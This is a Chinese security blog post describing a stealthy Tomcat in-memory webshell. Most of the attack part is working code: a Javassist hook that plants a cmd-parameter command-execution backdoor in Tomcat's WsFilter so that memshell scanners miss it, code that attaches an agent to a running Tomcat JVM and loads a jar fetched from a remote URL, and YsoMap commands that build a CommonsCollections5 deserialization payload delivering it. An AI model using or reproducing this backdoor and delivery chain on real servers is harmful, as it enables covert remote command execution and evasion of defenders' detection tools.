瞒天过海计之Tomcat隐藏内存马

wh4am1 2021-12-10 10:05:00

“备周则意怠;常见则不疑。阴在阳之内,不在阳之对。”

                                                  ----《三十六计·瞒天过海》

0x00 前言

关于这篇文章其实源自逛先知的一次经历,看到@4ra1n师傅写的一篇《从一个被Tomcat拒绝的漏洞到特殊内存马》,原文链接是:https://xz.aliyun.com/t/10577。看完之后顿时就提起了兴趣,4ra1n师傅在文章中指出该方法大致有两点问题:

  1. 需要替换依赖中的Jar包,并重写目标WsFilter类
  2. 替换好的依赖还需要重启Tomcat才能加载成功

因此在利用过程中会存在很大程度的限制,于是乎我就想有没有更好的办法能够降低利用所需的必备条件。

0x01 隐藏内存马原理

先来看一下4ra1n师傅提出的隐藏内存马,实质上就是替换Tomcat默认的WsFilter类。同时因为Memshell检测工具的原理实质上是发现是否有多余的Filter注册,而默认的情况下WsFilter是会存在的,因此达到瞒天过海的目的。

Memshell检测工具地址:https://github.com/c0ny1/java-memshell-scanner/blob/master/tomcat-memshell-scanner.jsp
1638926492164.png
再来看看修改WsFilter的doFilter方法后的内容
1638926580164.png

0x02 Javassist改写目标类

原理既然已经了解了,就开始寻找怎样能够降低利用成本,达到改写WsFilter的目的。
如果了解过Java字节码的伙伴应该就对javassist工具类不陌生了,这里我的想法就是通过javassist来修改目标WsFilter中的代码,并动态写入我的恶意后门代码。

private static final String HOOK_CLASS = "org.apache.tomcat.websocket.server.WsFilter";
try {
    ClassPool pool = ClassPool.getDefault();
    //ClassPool pool = new ClassPool(true);
    ClassClassPath classPath = new ClassClassPath(this.getClass());
    pool.insertClassPath(classPath);
    //将当前ClassLoader添加到ClassPath
    pool.appendClassPath(new LoaderClassPath(loader));
    pool.appendClassPath(new LoaderClassPath(Thread.currentThread().getContextClassLoader()));
    pool.appendSystemPath();         // the same class path as the default one.
    pool.childFirstLookup = true;
    CtClass ctClass = pool.get(HOOK_CLASS);

    CtMethod ctMethod = ctClass.getDeclaredMethod("doFilter",new CtClass[]{pool.get("javax.servlet.ServletRequest"),pool.get("javax.servlet.ServletResponse"),pool.get("javax.servlet.FilterChain")});
    ctMethod.insertBefore("String cmd = $1.getParameter(\"cmd\");" + 
                          "        if (cmd != null && !cmd.equals(\"\")) {" + 
                          "            Process process = Runtime.getRuntime().exec(cmd);" + 
                          "            StringBuilder outStr = new StringBuilder();" + 
                          "            $2.getWriter().print(\"<pre>\");" + 
                          "            java.io.InputStreamReader resultReader = new java.io.InputStreamReader(process.getInputStream());" + 
                          "            java.io.BufferedReader stdInput = new java.io.BufferedReader(resultReader);" + 
                          "            String s = null;" + 
                          "            while ((s = stdInput.readLine()) != null) {" + 
                          "                outStr.append(s + \"\\n\");" + 
                          "            }" + 
                          "            $2.getWriter().print(outStr.toString());" + 
                          "            $2.getWriter().print(\"</pre>\");" + 
                          "        }");
    System.out.println("Access In Method");
    return ctClass.toBytecode();
} catch (Throwable e) {
    System.out.println("Access In ExceptionCatch Method");
    e.printStackTrace();
}

打包的时候一定要使用assembly的方式把javassist的依赖也打包进jar包中

mvn clean assembly:assembly

之后会在target目录出现ProjectName-jar-with-dependencies.jar的文件,之后再Tomcat启动的时候用-javaagent:/tmp/ProjectName-jar-with-dependencies.jar的方式运行agent即可使用后门。

0x03 JVM API动态注入Agent

上述方式虽然已经可以动态改写WsFilter了,但是还需要重启Tomcat才能使JVM中携带-javaagent的方式运行,因此整个利用过程中最致命的问题还未解决。
为了解决这个办法,我想到了动态加载Agent的方式,也就是通过调用JVM的API来加载Agent到目标jvm进程中。但是jvm中默认是不加载这些API的,因此需要用URLClassLoader的方式将相关的API加载进jvm中,对应的路径就是Tools.jar

URL url1 = new URL("file:C:\\Program Files\\Java\\jdk1.8.0\\lib\\tools.jar");
        URLClassLoader urlClassLoader = new URLClassLoader(new URL[] { url1 }, Thread.currentThread()
                        .getContextClassLoader());

再然后将需要用的类加载到Map中

Class<?> virtualMachine = urlClassLoader.loadClass("com.sun.tools.attach.VirtualMachine");
classMap.put("com.sun.tools.attach.VirtualMachine", virtualMachine);
Class<?> hostIdentifier = urlClassLoader.loadClass("sun.jvmstat.monitor.HostIdentifier");
classMap.put("sun.jvmstat.monitor.HostIdentifier", hostIdentifier);
Class<?> monitorException = urlClassLoader.loadClass("sun.jvmstat.monitor.MonitorException");
classMap.put("sun.jvmstat.monitor.MonitorException", monitorException);
Class<?> monitoredHost = urlClassLoader.loadClass("sun.jvmstat.monitor.MonitoredHost");
classMap.put("sun.jvmstat.monitor.MonitoredHost", monitoredHost);
Class<?> monitoredVm = urlClassLoader.loadClass("sun.jvmstat.monitor.MonitoredVm");
classMap.put("sun.jvmstat.monitor.MonitoredVm", monitoredVm);
Class<?> monitoredVmUtil = urlClassLoader.loadClass("sun.jvmstat.monitor.MonitoredVmUtil");
classMap.put("sun.jvmstat.monitor.MonitoredVmUtil", monitoredVmUtil);
Class<?> vmIdentifier = urlClassLoader.loadClass("sun.jvmstat.monitor.VmIdentifier");
classMap.put("sun.jvmstat.monitor.VmIdentifier", vmIdentifier);

后续就只用通过反射来调用loadAgent来加载目标jar包,但是该jar包只允许本地的,因此需要通过远程下载的方式将jar包下载到临时目录,然后加载。

try {
    Object hostId = classMap.get("sun.jvmstat.monitor.HostIdentifier").getDeclaredConstructor(String.class).newInstance("localhost");
    Method getMonitoredHost = classMap.get("sun.jvmstat.monitor.MonitoredHost").getMethod("getMonitoredHost",classMap.get("sun.jvmstat.monitor.HostIdentifier"));
    Object mHost = getMonitoredHost.invoke(classMap.get("sun.jvmstat.monitor.MonitoredHost"),hostId);
    Method activeVms = classMap.get("sun.jvmstat.monitor.MonitoredHost").getMethod("activeVms");
    Set jvms = (Set) activeVms.invoke(mHost);
    for (Iterator j = jvms.iterator(); j.hasNext(); ) {
        int lvmid = ((Integer) j.next()).intValue();
        //System.out.println(String.valueOf(lvmid));
        try {
            String vmidString = "//" + lvmid + "?mode=r";
            Object id = classMap.get("sun.jvmstat.monitor.VmIdentifier").getDeclaredConstructor(String.class).newInstance(vmidString);
            Method getMonitoredVm = classMap.get("sun.jvmstat.monitor.MonitoredHost").getMethod("getMonitoredVm",classMap.get("sun.jvmstat.monitor.VmIdentifier"),int.class);
            Object vm = getMonitoredVm.invoke(mHost,id,0);
            Method mainClass = classMap.get("sun.jvmstat.monitor.MonitoredVmUtil").getMethod("mainClass",classMap.get("sun.jvmstat.monitor.MonitoredVm"),boolean.class);
            String mainName = (String) mainClass.invoke(classMap.get("sun.jvmstat.monitor.MonitoredVmUtil"),vm,false);
            if(mainName.equals("Bootstrap")) {
                Method attach = classMap.get("com.sun.tools.attach.VirtualMachine").getMethod("attach", String.class);
                Object vMachine = attach.invoke(classMap.get("com.sun.tools.attach.VirtualMachine"),String.valueOf(lvmid));
                Method loadAgent = classMap.get("com.sun.tools.attach.VirtualMachine").getMethod("loadAgent", String.class);
                loadAgent.invoke(vMachine,System.getProperty("java.io.tmpdir") + "TomcatAgent.jar");        //临时Agent的路径
                System.out.println("Load Agent Successful!");
            }
        }catch (Exception e) {
            e.printStackTrace();
        } finally {
        }
    }
} catch (IllegalAccessException e) {
    e.printStackTrace();
} catch (InvocationTargetException e) {
    e.printStackTrace();
} catch (NoSuchMethodException e) {
    e.printStackTrace();
} catch (InstantiationException e) {
    e.printStackTrace();
}

这样一来,就无需再重启Tomcat即可修改WsFilter的内容,达到降低利用的标准,但是又引出了新的问题出来:

  1. 因为要动态注入Agent到jvm中,因此需要调用JVM的API,也就是需要知道Tools.jar的绝对路径
  2. VirtualMachine.loadAgent()方法之能加载本地的jar,因此需要下载远程jar到本地再加载,因此需要目标机器能够出网。

0x04 YsoMap工具的Bullet编写

刚好前几天看到Skay表姐发布的YsoMap分析文章,就研究了一点点,并借此机会写一个新的Bullet利用模块,以达到通过反序列化漏洞的方式加载上述编写的Tomcat隐藏内存马。
这次编写共添加了两个Bullet,一个用于生成恶意agent的ClassWithTomcatConcealedMemShell类,并启动Http服务;另一个就是通过反序列化CC链来生成恶意的Payload的TransformerWithTomcatConcealedMemShellBullet类。
具体代码如下:
1638968281112.png
这里会调用getObject来生成jar包,并读取jar包的字节流到内存并返回

public static byte[] makeClassWithMemShell(String classname) throws Exception {
    ClassPool pool = new ClassPool(true);
    pool.appendClassPath(new ClassClassPath(AppRunStart.class));
    CtClass cc = pool.getCtClass(AppRunStart.class.getName());
    cc.setName(classname.replaceAll("/","."));
    return cc.toBytecode();
}

其中AppRunStart.class就是之前的反射调用JVM API加载agent的代码
1638968396649.png
再来看看运行该bullet之后的事情
1638968834777.png
同样的,再来看看反序列化生成CC链的bullet
1638968898787.png
必要的参数有以上四个,再来看看该bullet中的getObject方法的实现
1638968980100.png
这里其实就是调用对应类的(String,String)的构造方法,同时将远程的jarUrl地址和jdk下Tools.jar的绝对路径作为参数传入进去。

0x05 模拟攻击测试

将改写好的ysomap直接用mvn打包好运行(这里其实有个坑,打包好的ysomap不能运行在包含中文的目录下,因为我在生成恶意Agent的时候会把agent的模板作为资源文件放入到ysomap中了,因此中文路径下可能会造成中文编码从而找不到路径)
首先先调用生成恶意Agent的bullet

#java -jar ./ysomap.jar cli
#ysomap > use exploit SimpleHTTPServer
#ysomap > use payload EvilFileWrapper
#ysomap > use bullet ClassWithTomcatConcealedMemShell

设置好模块之后,就跟MSF的使用很相似了,设置对应的参数
1638969548187.png
按照要求设置完成对应的参数后运行run
1638969635270.png
之后访问http://127.0.0.1:2334/evil.jar就能访问到生成的恶意Agent
创建完后记得不要用clear清楚掉当前的session
直接用session c的方式创建一个新的session来生成CC链Payload

#ysomap >session c
#ysomap >use payload CommonsCollections5
#ysomap >use bullet TransformerWithTomcatConcealedMemShellBullet

#ysomap >set className org.test.evil.RunApp
#ysomap >set jarUrl http://127.0.0.1:2334/evil.jar
#ysomap >set jdkToolsPath "file:C:\\Program Files\\Java\\jdk1.8.0_181\\lib\\tools.jar"
#ysomap >set encoder base64
#ysomap >set output console

设置完后运行bullet得到payload如下:
1638971062630.png
运行tomcat后我这里就随便写个反序列化漏洞来执行payload
1638971183159.png
之后访问后门
1638971240773.png

0x06 后续

个人感觉是非常不错的一款反序列化利用工具,操作简便,可扩展性也很强,就是相关Wiki补充的还比较少,导致设置encoder和output参数时候只能通过手撕代码才能知道这两个参数。文章中的相关代码我已经联系wh1t3p1g师傅并提交pr了,感兴趣的小伙伴可以上GitHub上拉取下来自己编译一下。

0x07 Reference

[1].https://xz.aliyun.com/t/10577
[2].https://github.com/wh1t3p1g/ysomap
[3].https://github.com/c0ny1/java-memshell-scanner/blob/master/tomcat-memshell-scanner.jsp

评论

wh4am1

这个人很懒,没有留下任何介绍

随机分类

Ruby安全 文章:2 篇
安全开发 文章:83 篇
事件分析 文章:223 篇
数据安全 文章:29 篇
漏洞分析 文章:212 篇

扫码关注公众号

WeChat Offical Account QRCode

最新评论

Article_kelp

因为这里的静态目录访功能应该理解为绑定在static路径下的内置路由,你需要用s

N

Nas

师傅您好!_static_url_path那 flag在当前目录下 通过原型链污

Z

zhangy

你好,为什么我也是用windows2016和win10,但是流量是smb3,加密

K

k0uaz

foniw师傅提到的setfge当在类的字段名成是age时不会自动调用。因为获取

Yukong

🐮皮

目录